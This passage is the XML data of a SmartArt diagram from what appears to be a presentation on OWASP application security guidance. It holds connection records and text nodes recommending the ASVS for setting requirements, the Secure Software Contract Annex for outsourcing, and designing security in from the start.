    <dgm:cxn modelId="{203150CC-0F3F-45BE-9F5A-D2254D61B2E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" srcOrd="5" destOrd="0" parTransId="{F6854210-4FAC-4257-B882-980D94C69A89}" sibTransId="{714A456E-0F05-4956-B40C-07B05BE592F8}"/>
    <dgm:cxn modelId="{812FD558-0CC1-4C36-B25E-18FCE06EA12D}" srcId="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" destId="{F5A8502D-52C4-4B4A-ACF7-0A37A965A8B6}" srcOrd="0" destOrd="0" parTransId="{19F46D76-A2BD-46B9-94FE-57535FE3C1A8}" sibTransId="{4F009B1C-CA71-4886-8BD8-1834F3031679}"/>
    <dgm:cxn modelId="{CD4505AB-F295-4DBF-BDE3-234AE1950D08}" srcId="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" destId="{5DA0AAD8-DB42-4198-B614-1D5996278F65}" srcOrd="0" destOrd="0" parTransId="{41F9CA30-D50A-4966-BDAE-8D4514BFA5E0}" sibTransId="{84FC8053-FDE8-4A4C-8131-8A4B24494FE3}"/>
    <dgm:cxn modelId="{1AA23A82-4061-401B-A47E-EFAC421C5C82}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" srcOrd="7" destOrd="0" parTransId="{CF1391D4-B6B7-4AE2-B993-338C00C11B84}" sibTransId="{05EEABB9-F420-43FF-B065-1A7F16C9839E}"/>
    <dgm:cxn modelId="{A8340DD6-F371-41AF-B929-41C2A9D0E1D3}" type="presOf" srcId="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" destId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5311067-92D2-419F-BCCF-525CEFFE4616}" srcId="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" destId="{4FB0F712-7A12-4305-A804-F19DB2A74F1D}" srcOrd="0" destOrd="0" parTransId="{983F9778-1966-4F92-9D76-49AED59BA5D1}" sibTransId="{C9B9B97E-B4C8-4806-B7B1-0C0989D9A093}"/>
    <dgm:cxn modelId="{4EC8A31B-A603-4169-B3AF-6B7CC5FC3144}" srcId="{2BD590FA-9231-49C0-97E0-217A496C2237}" destId="{14EF3D90-B7BF-472E-9422-7B5778E09D13}" srcOrd="0" destOrd="0" parTransId="{2F9B48C0-85AA-453B-B650-01AA8ED87AF6}" sibTransId="{632CD812-98A5-4F26-9F34-EC4F9D15FA07}"/>
    <dgm:cxn modelId="{CCCFD819-1397-40BF-B77A-80238AB85FB6}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" srcOrd="8" destOrd="0" parTransId="{3E4FB5F1-8123-4CBF-ABA0-4D9C713C7B8A}" sibTransId="{D2E7E824-9857-4FA1-8D4C-966BADFFD02E}"/>
    <dgm:cxn modelId="{D7526BF8-3D84-473A-BD13-72C4368227C7}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{A1B85367-743A-4C9F-A891-07038BBF96F2}" srcOrd="2" destOrd="0" parTransId="{53C4939E-201B-4ED1-9161-7E355E0F4074}" sibTransId="{68A5A658-9210-4933-94F8-E5EB41BF4147}"/>
    <dgm:cxn modelId="{635FD6B7-EBAB-4B69-8EC4-D803EA7BEE02}" type="presOf" srcId="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" destId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27734F48-0EA8-40C4-AB8D-9B865F1F5E21}" type="presOf" srcId="{3A1C44CE-CCA3-4BD0-B54E-89DB7E3E4543}" destId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E7AF4FA8-50BA-4438-88DC-24520061291C}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{47E9EF4E-AA7A-42E3-9DB3-FF494FD47A04}" srcOrd="0" destOrd="0" parTransId="{00FA895F-EA9F-49D0-B094-026497ADB1F9}" sibTransId="{FFBA57D2-1B10-41DD-9593-2DE28EC9DE88}"/>
    <dgm:cxn modelId="{9E43CCD8-D5B0-4713-AE2D-4B4C020B6207}" type="presOf" srcId="{C7383E11-2997-46ED-9CDE-19D4351797B7}" destId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32A4F302-5987-424E-8EE4-DC0398FB69D4}" type="presOf" srcId="{4FB0F712-7A12-4305-A804-F19DB2A74F1D}" destId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{64EA57B5-69CD-49C3-9B03-E44D15D0B36F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C7383E11-2997-46ED-9CDE-19D4351797B7}" srcOrd="1" destOrd="0" parTransId="{7480DFFA-AE50-4F5A-9B34-549DC64CBECE}" sibTransId="{528554B3-3377-4274-ADB1-6970BE43DEBB}"/>
    <dgm:cxn modelId="{00E39E26-AF0C-41C0-84FD-64038494147D}" type="presOf" srcId="{F5A8502D-52C4-4B4A-ACF7-0A37A965A8B6}" destId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9421F470-78C5-4566-AEE3-B492692D7446}" srcId="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" destId="{C4E8E996-7C5B-4BA4-B933-DE6C0BAA3728}" srcOrd="0" destOrd="0" parTransId="{A9927FDB-9211-4A14-A3B9-13F746B34567}" sibTransId="{CEE520DC-DC8B-451B-A49E-0F5C4A893DD2}"/>
    <dgm:cxn modelId="{CD6092A4-C4DC-45ED-A751-1B3F7A06E9AA}" srcId="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" destId="{2CA751A3-FAC5-4333-8C12-EE4CE8E8AB39}" srcOrd="0" destOrd="0" parTransId="{FB3ED1EB-ADBC-4177-8BC2-4E567542EC6C}" sibTransId="{A2286D90-3029-415D-AE6F-2F380A320E85}"/>
    <dgm:cxn modelId="{84313AD1-D806-4F50-906D-164AF3200717}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" srcOrd="4" destOrd="0" parTransId="{D2A2FA93-5279-4E69-A1CA-8046392DF8BB}" sibTransId="{0D3D0307-BCC6-4666-B008-AB05B3454592}"/>
    <dgm:cxn modelId="{C09CDA34-B6A3-4717-8DE9-255D336A9884}" srcId="{A1B85367-743A-4C9F-A891-07038BBF96F2}" destId="{3A1C44CE-CCA3-4BD0-B54E-89DB7E3E4543}" srcOrd="0" destOrd="0" parTransId="{53F5BEB3-3EDE-4323-8D58-1235F631434F}" sibTransId="{D06F3C25-B302-446A-981A-0C9D3ABE828A}"/>
    <dgm:cxn modelId="{5D0FC350-E686-4776-A47D-ED7DCB3CF43B}" type="presOf" srcId="{14EF3D90-B7BF-472E-9422-7B5778E09D13}" destId="{191C5091-28DD-4765-9653-28B6CE68C4E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99BC30B6-08E9-4189-8A98-DC96CDC56BAD}" type="presOf" srcId="{2CA751A3-FAC5-4333-8C12-EE4CE8E8AB39}" destId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5B7C18B9-7574-45EA-9408-F5A93A2E8EE7}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E90C5705-2DCA-45D6-ADFF-671075599DE9}" type="presOf" srcId="{25555832-CE6E-49DC-8853-636E1959542E}" destId="{3AEEED12-760D-417A-B975-196C59CB31B8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56EABEEA-509F-4220-B7FD-7B176CA17F0C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" srcOrd="9" destOrd="0" parTransId="{C5ADD28B-795D-4030-8D34-142FCD3ADFA1}" sibTransId="{E086090F-2561-40F5-94CB-7FFBE1252C88}"/>
    <dgm:cxn modelId="{EF3952BD-4CCB-4FA7-9270-19C8ED5018E3}" type="presOf" srcId="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" destId="{2E090A74-1099-4AEA-9902-A404935E56DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D12E2220-E3D4-4AD9-8C72-73CD40A20BF9}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" srcOrd="6" destOrd="0" parTransId="{E1C6D0C2-4799-4B09-8EDB-71B4CE380B3C}" sibTransId="{DC6AC552-EC1D-4C41-BC2A-2A31755C14D6}"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{CAB21728-DD98-4C10-B970-D7C77870A35E}" type="presOf" srcId="{2BD590FA-9231-49C0-97E0-217A496C2237}" destId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CEF9AD90-C318-4153-ACF6-C78A2602E5A2}" type="presOf" srcId="{47E9EF4E-AA7A-42E3-9DB3-FF494FD47A04}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{07260CA8-1EA1-4453-AA4A-7AA35E12E747}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1388A4C0-C056-4B00-A5BB-0B5E6BD78609}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4CC162C5-BA85-421E-A194-1FD49596D585}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E2F2E404-4883-486F-85C1-539AB2C3D6A4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DBB1314C-2D17-45E7-B13B-855A606D5182}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{06753445-795E-4852-B39B-5A81E3AE22FA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9F74E8B3-6262-41FA-97A1-9D7D47883AF7}" type="presParOf" srcId="{06753445-795E-4852-B39B-5A81E3AE22FA}" destId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{508B8F58-E40A-451F-92B4-156C326B49D3}" type="presParOf" srcId="{06753445-795E-4852-B39B-5A81E3AE22FA}" destId="{52F1B1A3-C58C-409E-9189-6742201CA556}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D45E7DC8-2A12-43A8-BD24-A25361886CD8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{60C6FAA5-309B-4E4D-9AF3-F9B36FA3793F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45164E23-D710-4C12-9006-905EEC2AE1F8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{607560B6-B977-4D1C-97A0-595C7A55205A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{312F398A-44D7-4EBF-B702-603B21ECF944}" type="presParOf" srcId="{607560B6-B977-4D1C-97A0-595C7A55205A}" destId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5EC9AC93-DB3B-410A-9F9A-23D0CD7BFCB2}" type="presParOf" srcId="{607560B6-B977-4D1C-97A0-595C7A55205A}" destId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9376EF0D-7282-46A1-B6E9-A1F779C929AB}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{232A10D5-9CE7-4866-9B98-3442E96D191C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EDBC7913-0C88-4728-A64C-9E220F2B92F4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{56A0CB35-4DB9-4A39-BA7D-CE8C25A49E42}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D8C9E3DF-4673-46FA-89D5-819BDAA57045}" type="presParOf" srcId="{56A0CB35-4DB9-4A39-BA7D-CE8C25A49E42}" destId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5083F37E-D817-4566-9D02-41499975DD99}" type="presParOf" srcId="{56A0CB35-4DB9-4A39-BA7D-CE8C25A49E42}" destId="{191C5091-28DD-4765-9653-28B6CE68C4E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4572AF3D-5655-479D-979A-A145360B88B5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{9A6A0E46-45CA-442A-8601-BBA2D73584E4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{46C0BE1B-7543-4D58-879E-EFCB54D83447}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{F793DF08-4A07-4166-B1E1-1D362BA95C8F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{64C8ABF8-EE70-47A3-B1FC-24159C32D305}" type="presParOf" srcId="{F793DF08-4A07-4166-B1E1-1D362BA95C8F}" destId="{2E090A74-1099-4AEA-9902-A404935E56DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3A806AB1-D6E5-4804-ABEB-69CAEC5AD69A}" type="presParOf" srcId="{F793DF08-4A07-4166-B1E1-1D362BA95C8F}" destId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48A4E18E-1E45-4857-B895-9EEB63BC4E39}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{614D783F-9EA6-4A55-A7F2-79B49F95A4D5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{93E20138-109A-4B59-AF00-1528310DCAE3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{5C6E04D9-34F9-48BA-AE99-367B8D0960C9}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99C34FCE-C72F-469E-B0EA-D1C95DA19B86}" type="presParOf" srcId="{5C6E04D9-34F9-48BA-AE99-367B8D0960C9}" destId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4F710583-5FE4-4898-90F8-EEF3C3BB8676}" type="presParOf" srcId="{5C6E04D9-34F9-48BA-AE99-367B8D0960C9}" destId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{31D24F16-AF9F-4702-8FC7-2E16E0BF363A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{0A869A77-087B-4990-95D8-340F0D6466A4}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6519CDFA-1A56-4F4E-8F82-BAA96204FDA6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{07DBCB74-C0C4-443F-B333-47E942AEDD04}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0FF3EDAC-B948-4235-A405-C6AF4688E5CB}" type="presParOf" srcId="{07DBCB74-C0C4-443F-B333-47E942AEDD04}" destId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{718B1CA7-62BC-4576-9EE1-0A825C3E3A05}" type="presParOf" srcId="{07DBCB74-C0C4-443F-B333-47E942AEDD04}" destId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{96DAFF56-6649-4CFC-AE5E-982B2EFF71E6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E59023DB-6273-42AA-AC15-3F73F1A109E5}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1F162A55-3302-44FC-8EDD-780892757ED3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{60522597-A0FC-4303-B232-68C723F82950}" type="presParOf" srcId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" destId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F9A2A868-AE51-4E0A-9CD1-26DBEE558B6B}" type="presParOf" srcId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" destId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D7288062-5FB1-44EA-BB44-55C753E5FF3F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{5A8EE57E-71C8-45FF-8F85-DB1D3B00675A}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1904B415-641F-4A20-8B78-10976D22272C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D89974E4-42ED-44E3-BE9A-E2BC83845F71}" type="presParOf" srcId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" destId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0ABA3A08-AB39-4C04-91AF-54FE99000914}" type="presParOf" srcId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" destId="{3AEEED12-760D-417A-B975-196C59CB31B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BADCCDC2-8B0E-47CF-860F-AFA7BA87BFE9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D0CBEA6D-B12F-4310-BB76-D6EA68F3F0F3}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43EC7B01-53B1-423C-98A3-9CD42A3220B5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C6BDDBD5-99E5-4F37-B2E2-79E91D1A98FB}" type="presParOf" srcId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" destId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D1BB140E-5C18-4629-9354-80627076B15D}" type="presParOf" srcId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" destId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}"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dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Requirements</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>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39F11DF5-92F1-4803-9176-8CE41A00F711}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>To produce a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>secure</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>Application Security Verification Standard (ASVS)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A80C258-8448-4B2A-A29D-75B427DB2E14}" type="parTrans" cxnId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AC1C748-C2BF-49EE-BEA2-E40FA789A0EA}" type="sibTrans" cxnId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Architecture</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C44C12F1-0403-475A-AE8F-FC6620291395}" type="parTrans" cxnId="{B29B22A2-3156-48F5-A350-963380660B24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}" type="sibTrans" cxnId="{B29B22A2-3156-48F5-A350-963380660B24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Rather than retrofitting security into your applications, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
          </a:r>
